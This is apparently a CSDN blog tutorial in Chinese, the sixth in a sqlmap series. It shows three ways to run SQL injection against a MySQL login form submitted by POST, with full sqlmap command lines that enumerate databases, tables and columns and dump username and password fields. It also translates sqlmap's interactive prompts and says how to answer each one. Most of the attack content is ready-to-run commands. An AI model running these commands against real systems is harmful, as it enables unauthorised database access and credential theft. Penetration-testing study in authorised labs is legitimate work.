mysql 登录框注入_sqlmap之(六)----POST登陆框注入实战

本文介绍了如何使用sqlmap工具进行POST方式的MySQL登录注入攻击。通过Burp抓包、保存请求并利用sqlmap进行数据库、表和列的猜解,展示了三种不同的注入方法:1) 从文件中读取POST数据;2) 自动搜索表单;3) 指定参数注入。在每个步骤中,都详细说明了sqlmap的命令行选项和交互式确认过程。
摘要由CSDN通过智能技术生成

利用sqlmap进行POST注入,常见的有三种方法:

注入方式一:

1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下

dbc1df8bd0d8c762d1aff9fd36fe0b31.png

2.列数据库:

sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs

注:-r表示加载一个文件,-p指定参数

7905df89955f7206a2c21a9fb0862aee.png

其中出现了三次提示:

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

它看起来像后端DBMS是'mysql'。 是否要跳过特定于其他DBMS的测试负载? [Y/n]  输入"Y"

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

对于剩余的测试,您想要包括所有针对“MySQL”扩展提供的级别(1)和风险(1)值的测试吗? [Y/n] 输入"N"

POST parameter 'n' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

POST参数'n'是脆弱的。 你想继续测试其他人(如果有的话)吗?[y/N]  输入"Y"

以下是猜解出来的一些数据库总共有13个数据库。

f70118379f68bdae23b7707633c4b5b6.png

3.猜表

选择一个数据库,比如选fendo

sqlmap.py -r "c:\Users\fendo\Desktop\test.txt" -p n -D fendo --tables

025e685499261414995b22e9208ca1a2.png

得到user表。

4.猜列

sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n -D fendo -T user --columns

0dc72889f4966de4270a1549f7569a55.png

5.猜数据

sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n -D fendo -T user -C “username,password” --dump

df72bd8a2c2d10de042ee2f47d55504f.png

注入方式二:自动搜索表单的方式

sqlmap.py -u "http://192.168.160.1/sqltest/post.php" --forms

它会有几次消息提示:

c9769b1683685f43bac4851b0acd88b8.png

do you want to test this form? [Y/n/q]

要测试此表单吗?[Y/n/q]  输入"Y"

do you want to fill blank fields with random values? [Y/n]

是否要填充带有随机值的空白字段? [Y/n]  输入"Y"

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

它看起来像后端DBMS是'MySQL'。 是否要跳过特定于其他DBMS的测试负载? [Y/n] 输入"Y"

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

对于剩余的测试,您想要包括所有针对“MySQL”扩展提供的级别(1)和风险(1)值的测试吗?[Y/n]  输入"N"

POST parameter 'n' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

POST参数'n'是脆弱的。 你想继续测试其他人(如果有的话)吗?[y/N]  输入"N"

do you want to exploit this SQL injection? [Y/n]

你想利用SQL注入? 输入"Y"

9b3af1f4c509c870a2ffffb48813923d.png

注入方式三:指定一个参数的方法

sqlmap -u http://xxx.xxx.com/Login.asp --data "n=1&p=1"

0cb851cdbd1c8a042cdd8df10ef7f78e.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值